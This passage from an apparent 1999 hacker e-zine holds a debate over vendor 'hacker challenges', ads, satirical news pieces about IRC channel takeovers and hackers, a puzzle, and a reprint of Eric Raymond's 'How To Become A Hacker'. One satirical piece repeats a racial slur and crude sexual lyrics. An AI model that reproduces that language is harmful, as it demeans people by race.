o Seldom do the really good experts, on either side of the fence, participate in such exercises. Thus, anything done is usually done by amateurs. (The "honor" of having won the challenge is not sufficient to lure the good ones into the fray. Good consultants command fees of several thousand $$ per day in some cases -- why should they donate their time and names for what amounts to free consulting and advertising?)

Also note that any such challenge also serves to aid potential hackers in their later pursuits:

o It gives potential miscreants some period to practice breaking the system without penalty. Any other time spent hacking at one of these might result in legal action or worse. Isn't it nice the vendor is giving free practice time to the bad guys? I hope all the potential customers are equally pleased at this.

o It gives miscreants an excuse if they are caught trying to break into the system later (e.g., "We thought the contest was still on.") This might well weaken any legal action taken later.

o The vendor contest may actually even include some publication of hacks that don't work -- thus helping reduce the effort to compromise the system later.

Furthermore, the whole process sends the wrong message -- that we should build things and then try to break them, or that there is some prestige or glory in breaking systems. That isn't what we need. Instead, we want to promote responsible behavior, using established methods.
We need to establish that security is something best done by well-trained professionals, and that hacking into systems is not "job training". (I've argued this point in more detail in "Are Computer Break-Ins Ethical?", Journal of Systems and Software, Jan 1992, 17(1).)

Good security should be carefully designed in and tested using established methods. Tiger teams have a role, but using them (especially ad hoc teams) as a major means of establishing safety is negligent. Security "contests" to demonstrate a system are worse, and should be viewed negatively by potential customers. It should be generally recognized that such contests cannot establish more than cursory confidence in a product, are not a good means of testing, and actually create a climate that may encourage or enable people to try to break the product after it is in use.

If I was a potential customer of any security product, which of the following, somewhat exaggerated approaches would be more likely to convince me that a company had its act together? Which one is the company more likely to be seeking to sell based on smoke and mirrors?

o Approach A: Our product was coded by a bunch of really talented hackers and former system crackers who learned everything they know on the IRC. We put our product up on the Internet for 6 months, and offered a nifty backpack and some money to anyone who could break in. No one claimed the prize. Obviously, ours is a superior product.

o Approach B: Our company is certified as an ISO 9000 company. We used formal software engineering approaches to design and build our product, ending in full functional testing, D-U path testing, and statement coverage to 98%. We also hired well-known independent security experts A, B, and C under non-disclosure to examine the code and identify weaknesses, and then conduct field trials. Company X and University Y have also had the opportunity to examine and test our product, and none of them have found flaws.
Approach "B" is clearly the one we want to encourage. Approach "A" encourages cycles of "penetrate and patch" and that is what is wrong with most mass-market software available today. However, vendors claim that Approach "A" is what sells more product than Approach "B," in part because it seems to inspire more confidence, and in part because it is cheaper to produce software if they don't use an approach like "B".

If we, as a community and a profession, want better quality and more trustworthy products, we must begin to demonstrate it. The best way is in the marketplace, by showing a willingness to buy based on substance, and not flash. Saying "no" to attempts to sell us products based on "hacker challenges" is one way to do that.

Replies:
++++++++

Sameer Parekh, Community ConneXion, (sameer@c2.org URL:http://www.c2.org/):

Most of Gene's points are very valid, and I agree with them. His points are aimed at challenges promoted by a company in order to show that a product is secure. On the other hand, the Community ConneXion challenges are promoted in order to show that a product is *insecure*. It's easy to prove insecurity, but hard to prove security. The vendor-supported challenges are trying to prove security, which is rather misguided. In proving insecurity though, our challenges are rather simple, as they only require one counter-example to be proven that a system is insecure.

- - - - - - -

Jon Wiederspan, ComVista (jon@comvista.com URL: http://www.comvista.com/) :

We received a very similar letter from Mr. Spafford when we first began our contest and posted an extensive reply on our site while it was in operation. I will summarize the main points for Cipher readers:

1) Mr. Spafford says that these challenges are a poor way of testing software. That is true, however it was never our purpose to test the software by running a challenge. The testing has been completed or we would not have been confident enough to place $10,000 on the line.
The main purpose of our security challenge was to promote awareness of the existence of security options for Macintosh servers. It was never intended as proof of the security of the system or to replace rigorous testing.

2) Mr. Spafford says that these contests promote hacking. We disagree with that entirely. By his argument, the Daytona 500 is responsible for people driving too fast on highways. I think there are people who drive as if they are on a race track (one passed me this morning on my way to work) but it is clear that rules on the highway are different from rules on the race track and no court in the land would let a person get away with arguing differently. We clearly stated on our site the limitations of the contest including a warning that we were not condoning similar attacks on systems other than the one provided for the contest.

3) Mr. Spafford says that these contests make it easier to break other systems. Mr. Spafford is looking in the wrong place. Bulletin boards, newsletters, Web sites and more all exist with information on how to hack into systems. Books have been written on the subject, movies made, and special investigative reports offered on television all on the subject. Writing about what failed on our site will not help hackers significantly. Our site also did not provide free practice to hackers because *none of the attempts worked*. Practice is useless if you do not at some point succeed.

4) Mr. Spafford says that it is wrong to test things by trying to break them. I don't think he thought about what he was saying there. What is beta testing but an attempt to find where software will break? Stress testing for metal structures? Crash testing cars? It is a fact of life that part of testing a product is to find where it will fail, which means trying actively to break the product in a variety of ways.

In summary, it is our opinion that Mr. Spafford's letter has no bearing on the challenge that we had online.
He probably would have been better served by investigating our site more thoroughly before writing the letter.

- - - - - -

Jeff Weinstein, Netscape (jsw@netscape.com, URL: http://home.netscape.com/people/jsw)

My quick reaction is that the Netscape Bugs Bounty is not a "hacker challenge". It is a way to reward users for helping to find bugs that get past us. I don't think that we make any claims such as "our product must be secure because no one claimed our hacker prize". We also don't view the bug bounty as a replacement for our own QA efforts, but a supplement to it.

- - - - - -

Secure Computing Corporation, sponsors of the Sidewinder challenge reported in Cipher EI#6, declined to comment.

AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

*** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! **
Support 2600.com and the Free Kevin defense fund site, visit it now! FREE KEVIN!
www.2600.com www.freekevin.com www.kevinmitnick.com

One of our sponsors, visit them now: www.csoft.net

WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV
JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD

WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM

To place an ad in this section simply type it up and email it to hwa@press,usmc.net, put AD! in the subject header please. - Ed

@HWA

HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~

Don't be happy, worry.

IRC Security: Who to Trust
Contributed by siko
Thursday - March 25, 1999. 02:35AM GMT

These days the IRC waters can be just as dangerous as a raging inferno. Op the wrong nick and you could lose an entire channel in a matter of seconds. "Anyone can download a script these days and deop the regular channel members these days. The old days you had to load up telnet.exe, these days you type /hack and you are good to go.", says IRC Security Expert Mark Winters. "If you are really skilled, you could even do what is known as 'riding a split'".
Certain IRC Networks are not prone to this type of hostile attack, such as Dalnet and Undernet due to channel bots employed by the IRC network to prevent such actions. The only trade off in the matter is Dalnet and Undernet fucking blow.

A recent example of a hostile takeover would include a short takeover of #wsvw1u, thought to be masterminded by 'vize' of Efnet. Vize held ops in the channel for several minutes while attempting to harass and threaten Innerpulse writer siko. Siko did not fret, however, since he noticed ops had been restored during the trash talk session vize was putting on. Upon being banned from #wsvw1u, vize entered #innerpulse, which was at the time opless to hurt the self-respect level of channel members by calling them 'lame.'. This highly original insult offended one member so much, he opened a windows nuker and proceeded to nuke vize 8 times before finally parting the channel with the message "you will all be owned" (not in those letters... y0u w1ll 4ll b3 0wned).

What type of prevention are IRCOps on Efnet taking to stop hostile channel takeover artists like this one? Innerpulse contacted #us-opers and asked for answers. "It is believed that users are responsible for their own channels and their channels well being," said Disciple. After several minutes, Innerpulse learned Disciple was not an IRCOp and stopped giving a shit about his opinions.

Efnet Information

Ma$e Signs Deal With CDNow.com
Contributed by siko
Thursday - March 25, 1999. 01:46AM GMT

Bad Boy rap artist, Ma$e, has signed a deal with CDNow.com to write and perform music aimed at Internet technologies. They will be compiled and released under the upcoming album 'Internet World', second to his platinum album, 'Harlem World'. "I was excited about the offer because sometimes I'm just kickin it with my homies on IRC and I get these ideas.
I plan to rap about the trials and tribulations brought on by the Internet, including taking channels on IRC, packeting AntiOnline, playing all the ladies on America Online, among other things.", said Ma$e yesterday at an official press conference. "Hopefully this will let the world know about the struggles that exist on todays Internet." Ma$e's first song that he has started production on in the studio is called 'Lookin at Me'. He shows off his lyrical prowess with lines such as 'Soon as I join the channel people is like damn who is he, and please, I hope he don't nuke me'. Another verse taking aim at 'lamers' goes: "And if you are a lamer, and you got a net girlie, don't be real committed, because Ma$e will net-bang her.". Staying true to the game, there are several skits included on the cd. Among the planned skits are Ma$e accidentally messing up his AOL Instant Messages and telling Shania he will meet her at 7pm when he meant to send the Instant Message to Faruka, a real black queen. Ma$e describes his everyday troubles waking up and signing on in his song 'Niggaz Wanna DoS'. Ma$e shows he is a lyrical soldier with lines such as 'You wanna fuck with Ma$e, you'll get your wig rocked nigga, You wanna fuck with Innerpulse, You'll get your IP nuked nigga.". The album should be out in late July, 1999. Doonesbury Author Reveals Source of Information Contributed by siko Wednesday - March 24, 1999. 09:11PM GMT Doonesbury is a well known comic strip that runs in thousands of publications nationwide. The past couple strips run have included jargon from the cyberculture underground, such as script kiddie and newbie. What started as a portal to the public has swiftly turned into a mess. "In an effort to show off my computer skills, I used the expert term 'tracing the exploit to his isp number'", said G.B Trudea, the writer of Doonesbury. "But I guess after my latest strip its kind of hard to hide the fact that I figured this out in #rootworm of Undernet.". 
"He wanted to know about computer crimes so he could showcase them in this weeks strip. So basically I just told him everything I knew", said one hacker who goes by the handle 'vortek'. "I think its cool the public will understand what goes on behind the scenes. I mean, attention is the ultimate goal of a 13 year old abused child.." Innerpulse, although never a fan of Doonesbury in the past, has seen computer related material in Doonesbury before. Images portraying long nose, bony face geeks with glasses working hard at their computer 'hacking' is nothing new to the strip. What is new to the strip, is the legal action being brought against it by AntiOnline.com for its illegal use of the term "exploit", a term they believe they own rights to. Doonesbury Comic Innerpulse Could 'Use more food' at the Office Contributed by siko Wednesday - March 24, 1999. 08:00AM GMT Innerpulse Media has decided to search for a second sponsor in hopes of making a small profit to buy food for needy children. You can keep Innerpulse.com running by clicking the banner on the page. Thank you, and look for the new Innerpulse, dubbed the Innerpulse Network, coming January 16.. I mean 3 months later (just like antionline). http://www.segfault.org/story.phtml?mode=2&id=36faccb8-03739440 NATO authorizes airstrikes on hackers Silicon Valley, California -- Chat rooms were unusually deserted, spammers went on panicked last-minute mail-bombing sprees and bomb shelters filled to overflowing today as gloom engulfed hackers waiting for NATO strikes. Hackers showed a mix of fear and defiance toward the Western military alliance, aware it could strike at any moment against strategic hacker targets after yet another embarrassing vandalism of a U.S. Department of Defense website. "This waiting for strikes is killing me," said w4r3z_f14r3, a 22-year-old student in the controversial Computer Science department at the Massachusetts Institute of Technology. 
"If they want to bomb us, they should do it now so I can get back to cracking Afterlife II." Graphics illegally uploaded to an Associated Press website accompanied a note which stated, "F1n1$h 7h1Z 60mb1n9 0r f4c3 my uur47h, I 4m l337!!! H4x0rs un173!" The web server was quickly downed in a flurry of flamewars over the proper use of the word 'hacker' versus 'cracker' in the page. Many college-age hackers stayed home rather than attending school, though most admit they would have stayed home anyway. Y2K websites issued detailed FAQs to threatened hackers in case of bombing, including information on how long canned goods stay fresh in underground shelters, how to fix a misfiring diesel generator, and how to sow grain in the field with a plow and oxen. Bomb shelters, unused in emergency since DefCon 4, were cleaned up during the last NATO threat in August, when the alliance previously announced its intention to launch airstrikes at the notorious hacker group Cult of the Dead Cow. Most shelters have been turned into underground bunkers featuring ISDN lines with triple-redundancy backups, as once the hackers moved in, they found the absence of sunlight and social involvement enjoyable. Despite the danger, supporters of hard-line hackers were defiant. "NATOns will fire their missiles from a distance," said Lord Kreel, an NT cracker. "Meanwhile, I will be cracking into the Pentagon with my friends in the Lackeys of Terror. We plan to install Windows on all of their computers, which will cripple their systems beyond repair." Opponents of "black hat" hacking think NATO strikes will actually increase the popularity of cracking among the techno-elite, but cement the popular image of the hacker as a no-good techie pirate bent on stealing credit card numbers and eating babies. "Now, [crackers will] attack all the media sites, plastering the entire web with links to porno and warez sites, and lag the whole net to hell", said hacker Frodo Majere. 
"If NATO thinks they will bend hackers with bombs, they are dead wrong." Supporters of the infamous jailed hacker Kevin Mitnick have reportedly been preparing to strike at well-known pro-NATO companies and military organizations as soon as the first NATO bomb lands on hacker territory. "We'll introduce Y2K bugs to systems where you'll never find them. We will end the disgusting greed-infested system of monopolist capitalism by freeing information forever. Linux is the One, True God," said one hacker, before he was shot and killed by an enraged fanatic wearing a red "GNU NOT Linux" headband, symbol of the underground terrorist organization FSF. A press release issued by the FSF's guerilla leader, known only as RMS, claimed responsibility for the killing. NATO's secretary-general Javler Selena authorized airstrikes against known hacker sites on Tuesday, after hackers on the IRC channel #2600 rebuffed a last-ditch peace offer and gave out free root accounts on the whitehouse.gov server. "In the past, computer security was a war of escalation between system administrators and joy-riding hackers," said a spokesperson for the anti-hacker group Freedom Through Oppression. "It's high time we brought the war to the instigators and bombed these hacker scum back to the Stone Age. To make the Internet safe for everyone, we must squash dissension once and for all. Countries have been nuked for less." "If you don't stand up to the theft of intellectual property of innocent companies such as SysMicrosoft and AppMicrosoft, you threaten American competitiveness and the ability to innovate," said President Gates, as he sought -- and got -- support from congressional leaders for military action. "We must halt the hackers and save the Internet for our children and the future of our country. 
The dirty, despicable hackers will no longer disrupt websites to make fun of our institutions, or pollute the Information Superhighway with filthy swear words," said former Vice President Al Gore, founder of the Internet, before he suddenly toppled over and dumped core. "NTLDR not found. INVALID_BOOT_DEVICE in kernel32.exe 006383dhX00029393."

Posted on Fri 26 Mar 00:21:38 1999 GMT
Written by Potato

Puzzle:
~~~~~~

How far apart are these two network cards?

---------------------| |----------------------- | | | | | card1 [=]-- coax --[=] card2 | | | - | - | | -------IIIIIIIIIIIIII| - \/ - |IIIIIIIIIIIIIIII-------

Hints:
The connectors do not count
the answer is in inches
yes it is a 'trick' question
yes they are network cards
it is coaxial ethernet 10Mb/s
the drop in the loop is 25'

@HWA

HOW.TO How to hack part 3
~~~~~~~~~~~~~~~~~~

To be continued (probably) in a future issue... if time permits and inclination is prevalent. ie: if & when I feel like it.. :p

Meanwhile read this: http://www.nmrc.org/faqs/hackfaq/hackfaq.html

And especially, this: http://www.tuxedo.org/~esr/faqs/hacker-howto.html (published below in its entirety due to relevance and eloquence)...

$Date: 1999/03/26 09:18:00 $

( Translations into: French Spanish Italian German Japanese Korean Swedish Portuguese Russian available at site)

How To Become A Hacker

Why This Document?

As editor of the Jargon File, I often get email requests from enthusiastic network newbies asking (in effect) "how can I learn to be a wizard hacker?". Oddly enough there don't seem to be any FAQs or Web documents that address this vital question, so here's mine.

If you are reading a snapshot of this document offline, the current version lives at http://www.tuxedo.org/~esr/faqs/hacker-howto.html.

What Is A Hacker?

The Jargon File contains a bunch of definitions of the term `hacker', most having to do with technical adeptness and a delight in solving problems and overcoming limits.
If you want to know how to become a hacker, though, only two are really relevant. There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term `hacker'. Hackers built the Internet. Hackers made the Unix operating system what it is today. Hackers run Usenet. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and other people in it know who you are and call you a hacker, you're a hacker. The hacker mind-set is not confined to this software-hacker culture. There are people who apply the hacker attitude to other things, like electronics or music -- actually, you can find it at the highest levels of any science or art. Software hackers recognize these kindred spirits elsewhere and may call them "hackers" too -- and some claim that the hacker nature is really independent of the particular medium the hacker works in. But in the rest of this document we will focus on the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term `hacker'. There is another group of people who loudly call themselves hackers, but aren't. These are people (mainly adolescent males) who get a kick out of breaking into computers and phreaking the phone system. Real hackers call these people `crackers' and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn't make you a hacker any more than being able to hotwire cars makes you an automotive engineer. Unfortunately, many journalists and writers have been fooled into using the word `hacker' to describe crackers; this irritates real hackers no end. The basic difference is this: hackers build things, crackers break them. 
If you want to be a hacker, keep reading. If you want to be a cracker, go read the alt.2600 newsgroup and get ready to do five to ten in the slammer after finding out you aren't as smart as you think you are. And that's all I'm going to say about crackers. The Hacker Attitude Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude. But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. Becoming the kind of person who believes these things is important for you -- for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mind-set of masters -- not just intellectually but emotionally as well. So, if you want to be a hacker, repeat the following things until you believe them: 1. The world is full of fascinating problems waiting to be solved. Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, in pushing themselves past their own physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence. If you aren't the kind of person that feels this way naturally, you'll need to become one in order to make it as a hacker. Otherwise you'll find your hacking energy is sapped by distractions like sex, money, and social approval. 
(You also have to develop a kind of faith in your own learning capacity -- a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you'll learn enough to solve the next piece -- and so on, until you're done.) 2. Nobody should ever have to solve a problem twice. Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there. To behave like a hacker, you have to believe that the thinking time of other hackers is precious -- so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones. (You don't have to believe that you're obligated to give all your creative product away, though the hackers that do are the ones that get most respect from other hackers. It's consistent with hacker values to sell enough of it to keep you in food and rent and computers. It's consistent to use your hacking skills to support a family or even get rich, as long as you don't forget you're a hacker while you're doing it.) 3. Boredom and drudgery are evil. Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing what only they can do -- solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil. To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers). (There is one apparent exception to this. 
Hackers will sometimes do things that may seem repetitive or boring to an observer as a mind-clearing exercise, or in order to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice -- nobody who can think should ever be forced into boredom.) 4. Freedom is good. Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by -- and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smother you and other hackers. (This isn't the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kinds of authority in order to get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.) Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing -- they only like `cooperation' that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief. 5. Attitude is no substitute for competence. To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work. Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won't let posers waste their time, but they worship competence -- especially competence at hacking, but competence at anything is good. 
Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best. If you revere competence, you'll enjoy developing it in yourself -- the hard work and dedication will become a kind of intense play rather than drudgery. And that's vital to becoming a hacker. Basic Hacking Skills The hacker attitude is vital, but skills are even more vital. Attitude is no substitute for competence, and there's a certain basic toolkit of skills which you have to have before any hacker will dream of calling you one. This toolkit changes slowly over time as technology creates new skills and makes old ones obsolete. For example, it used to include programming in machine language, and didn't until recently involve HTML. But right now it pretty clearly includes the following: 1. Learn how to program. This, of course, is the fundamental hacking skill. If you don't know any computer languages, I recommend starting with Python. It is cleanly designed, well documented, and relatively kind to beginners. Despite being a good first language, it is not just a toy; it is very powerful and flexible and well suited for large projects. But be aware that you won't reach the skill level of a hacker or even merely a programmer if you only know one language -- you need to learn how to think about programming problems in a general way, independent of any one language. To be a real hacker, you need to have gotten to the point where you can learn a new language in days by relating what's in the manual to what you already know. This means you should learn several very different languages. If you get into serious programming, you will have to learn C, the core language of Unix (though it's not the one to try learning first thing). Other languages of particular importance to hackers include Perl and LISP. 
Perl is worth learning for practical reasons; it's very widely used for active web pages and system administration, so that even if you never write Perl you should learn to read it. LISP is worth learning for the profound enlightenment experience you will have when you finally get it; that experience will make you a better programmer for the rest of your days, even if you never actually use LISP itself a lot. It's best, actually, to learn all four of these (Python, C, Perl, and LISP). Besides being the most important hacking languages, they represent very different approaches to programming, and each will educate you in valuable ways. I can't give complete instructions on how to learn to program here -- it's a complex skill. But I can tell you that books and courses won't do it (many, maybe most of the best hackers are self-taught). What will do it is (a) reading code and (b) writing code. Learning to program is like learning to write good natural language. The best way to do it is to read some stuff written by masters of the form, write some things yourself, read a lot more, write a little more, read a lot more, write some more ... and repeat until your writing begins to develop the kind of strength and economy you see in your models. Finding good code to read used to be hard, because there were few large programs available in source for fledgeling hackers to read and tinker with. This has changed dramatically; open-source software, programming tools, and operating systems (all built by hackers) are now widely available. Which brings me neatly to our next topic... 2. Get one of the open-source Unixes and learn to use and run it. I'm assuming you have a personal computer or can get access to one (these kids today have it so easy :-)). The single most important step any newbie can take towards acquiring hacker skills is to get a copy of Linux or one of the BSD-Unixes, install it on a personal machine, and run it. 
Yes, there are other operating systems in the world besides Unix. But they're distributed in binary -- you can't read the code, and you can't modify it. Trying to learn to hack on a DOS or Windows machine or under MacOS is like trying to learn to dance while wearing a body cast. Besides, Unix is the operating system of the Internet. While you can learn to use the Internet without knowing Unix, you can't be an Internet hacker without understanding it. For this reason, the hacker culture today is pretty strongly Unix-centered. (This wasn't always true, and some old-time hackers aren't happy about it, but the symbiosis between Unix and the Internet has become strong enough that even Microsoft's muscle doesn't seem able to seriously dent it.) So, bring up a Unix -- I like Linux myself but there are other ways (and yes, you can run both Linux and DOS/Windows on the same machine). Learn it. Run it. Tinker with it. Talk to the Internet with it. Read the code. Modify the code. You'll get better programming tools (including C, Lisp, Python, and Perl) than any Microsoft operating system can dream of, you'll have fun, and you'll soak up more knowledge than you realize you're learning until you look back on it as a master hacker. For more about learning Unix, see The Loginataka. To get your hands on a Linux, see the Where can I get Linux. 3. Learn how to use the World Wide Web and write HTML. Most of the things the hacker culture has built do their work out of sight, helping run factories and offices and universities without any obvious impact on how non-hackers live. The Web is the one big exception, the huge shiny hacker toy that even politicians admit is changing the world. For this reason alone (and a lot of other good ones as well) you need to learn how to work the Web. This doesn't just mean learning how to drive a browser (anyone can do that), but learning how to write HTML, the Web's markup language. 
If you don't know how to program, writing HTML will teach you some mental habits that will help you learn. So build a home page. But just having a home page isn't anywhere near good enough to make you a hacker. The Web is full of home pages. Most of them are pointless, zero-content sludge -- very snazzy-looking sludge, mind you, but sludge all the same (for more on this see The HTML Hell Page). To be worthwhile, your page must have content -- it must be interesting and/or useful to other hackers. And that brings us to the next topic... Status in the Hacker Culture Like most cultures without a money economy, hackerdom runs on reputation. You're trying to solve interesting problems, but how interesting they are, and whether your solutions are really good, is something that only your technical peers or superiors are normally equipped to judge. Accordingly, when you play the hacker game, you learn to keep score primarily by what other hackers think of your skill (this is why you aren't really a hacker until other hackers consistently call you one). This fact is obscured by the image of hacking as solitary work; also by a hacker-cultural taboo (now gradually decaying but still potent) against admitting that ego or external validation are involved in one's motivation at all. Specifically, hackerdom is what anthropologists call a gift culture. You gain status and reputation in it not by dominating other people, nor by being beautiful, nor by having things other people want, but rather by giving things away. Specifically, by giving away your time, your creativity, and the results of your skill. There are basically five kinds of things you can do to be respected by hackers: 1. Write open-source software. The first (the most central and most traditional) is to write programs that other hackers think are fun or useful, and give the program sources to the whole hacker culture to use. 
(We used to call these works ``free software'', but this confused too many people who weren't sure exactly what ``free'' was supposed to mean. Many of us now prefer the term ``open-source'' software). Hackerdom's most revered demigods are people who have written large, capable programs that met a widespread need and given them away, so that now everyone uses them. 2. Help test and debug open-source software They also serve who stand and debug open-source software. In this imperfect world, we will inevitably spend most of our software development time in the debugging phase. That's why any open-source author who's thinking will tell you that good beta-testers (who know how to describe symptoms clearly, localize problems well, can tolerate bugs in a quickie release, and are willing to apply a few simple diagnostic routines) are worth their weight in rubies. Even one of these can make the difference between a debugging phase that's a protracted, exhausting nightmare and one that's merely a salutary nuisance. If you're a newbie, try to find a program under development that you're interested in and be a good beta-tester. There's a natural progression from helping test programs to helping debug them to helping modify them. You'll learn a lot this way, and generate good karma with people who will help you later on. 3. Publish useful information. Another good thing is to collect and filter useful and interesting information into Web pages or documents like FAQs (Frequently Asked Questions lists), and make those generally available. Maintainers of major technical FAQs get almost as much respect as open-source authors. 4. Help keep the infrastructure working. The hacker culture (and the engineering development of the Internet, for that matter) is run by volunteers. 
There's a lot of necessary but unglamorous work that needs done to keep it going -- administering mailing lists, moderating newsgroups, maintaining large software archive sites, developing RFCs and other technical standards.

People who do this sort of thing well get a lot of respect, because everybody knows these jobs are huge time sinks and not as much fun as playing with code. Doing them shows dedication.

5. Serve the hacker culture itself.

Finally, you can serve and propagate the culture itself (by, for example, writing an accurate primer on how to become a hacker :-)). This is not something you'll be positioned to do until you've been around for a while and become well-known for one of the first four things.

The hacker culture doesn't have leaders, exactly, but it does have culture heroes and tribal elders and historians and spokespeople. When you've been in the trenches long enough, you may grow into one of these. Beware: hackers distrust blatant ego in their tribal elders, so visibly reaching for this kind of fame is dangerous. Rather than striving for it, you have to sort of position yourself so it drops in your lap, and then be modest and gracious about your status.

The Hacker/Nerd Connection

Contrary to popular myth, you don't have to be a nerd to be a hacker. It does help, however, and many hackers are in fact nerds. Being a social outcast helps you stay concentrated on the really important things, like thinking and hacking.

For this reason, many hackers have adopted the label `nerd' and even use the harsher term `geek' as a badge of pride -- it's a way of declaring their independence from normal social expectations. See The Geek Page for extensive discussion.

If you can manage to concentrate enough on hacking to be good at it and still have a life, that's fine. This is a lot easier today than it was when I was a newbie in the 1970s; mainstream culture is much friendlier to techno-nerds now.
There are even growing numbers of people who realize that hackers are often
high-quality lover and spouse material. For more on this, see Girl's Guide
to Geek Guys.

If you're attracted to hacking because you don't have a life, that's OK too
-- at least you won't have trouble concentrating. Maybe you'll get one
later.

Points For Style

Again, to be a hacker, you have to enter the hacker mindset. There are some
things you can do when you're not at a computer that seem to help. They're
not substitutes for hacking (nothing is) but many hackers do them, and feel
that they connect in some basic way with the essence of hacking.

  * Read science fiction. Go to science fiction conventions (a good way to
    meet hackers and proto-hackers).
  * Study Zen, and/or take up martial arts. (The mental discipline seems
    similar in important ways.)
  * Develop an analytical ear for music. Learn to appreciate peculiar kinds
    of music. Learn to play some musical instrument well, or how to sing.
  * Develop your appreciation of puns and wordplay.
  * Learn to write your native language well. (A surprising number of
    hackers, including all the best ones I know of, are able writers.)

The more of these things you already do, the more likely it is that you are
natural hacker material. Why these things in particular is not completely
clear, but they're connected with a mix of left- and right-brain skills
that seems to be important (hackers need to be able to both reason
logically and step outside the apparent logic of a problem at a moment's
notice).

Finally, a few things not to do.

  * Don't use a silly, grandiose user ID or screen name.
  * Don't get in flame wars on Usenet (or anywhere else).
  * Don't call yourself a `cyberpunk', and don't waste your time on anybody
    who does.
  * Don't post or email writing that's full of spelling errors and bad
    grammar.

The only reputation you'll make doing any of these things is as a twit.
Hackers have long memories -- it could take you years to live it down
enough to be accepted.

Other Resources

Peter Seebach maintains an excellent Hacker FAQ for managers who don't
understand how to deal with hackers.

The Loginataka has some things to say about the proper training and
attitude of a Unix hacker.

I have also written A Brief History Of Hackerdom.

I have written a paper, The Cathedral and the Bazaar, which explains a lot
about how the Linux and open-source cultures work. I have addressed this
topic even more directly in its sequel Homesteading the Noosphere.

Frequently Asked Questions

Q: Will you teach me how to hack?

Since first publishing this page, I've gotten several requests a week from
people to "teach me all about hacking". Unfortunately, I don't have the
time or energy to do this; my own hacking projects take up 110% of my time.

Even if I did, hacking is an attitude and skill you basically have to teach
yourself. You'll find that while real hackers want to help you, they won't
respect you if you beg to be spoon-fed everything they know.

Learn a few things first. Show that you're trying, that you're capable of
learning on your own. Then go to the hackers you meet with specific
questions.

Q: Would you help me to crack a system, or teach me how to crack?

No. Anyone who can still ask such a question after reading this FAQ is too
stupid to be educable even if I had the time for tutoring. Any emailed
requests of this kind that I get will be ignored or answered with extreme
rudeness.

Q: Where can I find some real hackers to talk with?

The best way is to find a Unix or Linux user's group local to you and go to
their meetings (you can find links to several lists of user groups on the
LDP page at Sunsite).

(I used to say here that you wouldn't find any real hackers on IRC, but I'm
given to understand this is changing. Apparently some real hacker
communities, attached to things like GIMP and Perl, have IRC channels now.)

Q: What language should I learn first?

HTML, if you don't already know it.
There are a lot of glossy, hype-intensive bad HTML books out there, and
distressingly few good ones. The one I like best is HTML: The Definitive
Guide.

But HTML is not a full programming language. When you're ready to start
programming, I would recommend starting with Python. You will hear a lot of
people recommending Perl, and Perl is still more popular than Python, but
it's harder to learn.

C is really important, but it's also much more difficult than either Python
or Perl. Don't try to learn it first.

Q: But won't open-source software leave programmers unable to make a
living?

This seems unlikely -- so far, the open-source software industry seems to
be creating jobs rather than taking them away. If having a program written
is a net economic gain over not having it written, a programmer will get
paid whether or not the program is going to be free after it's done. And,
no matter how much "free" software gets written, there always seems to be
more demand for new and customized applications. I've written more about
this at the Open Source pages.

Q: How can I get started? Where can I get a free Unix?

Elsewhere on this page I include pointers to where to get the most commonly
used free Unix. To be a hacker you need motivation and initiative and the
ability to educate yourself. Start now...

$Date: 1999/03/26 09:18:00 $
Eric S. Raymond

@HWA

SITE.1 Featured site: http://www.w00w00.org/
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This is an excerpt entitled "Security and Monitoring Tools" for the
paranoid sysadmin and is a good example of some of the quality content that
can be found at this site. There are some good examples here; check out the
site for more...

www.w00w00.org, "w00w00 Security"

Security and Monitoring Tools
-----------------------------
Shok (Matt Conover)
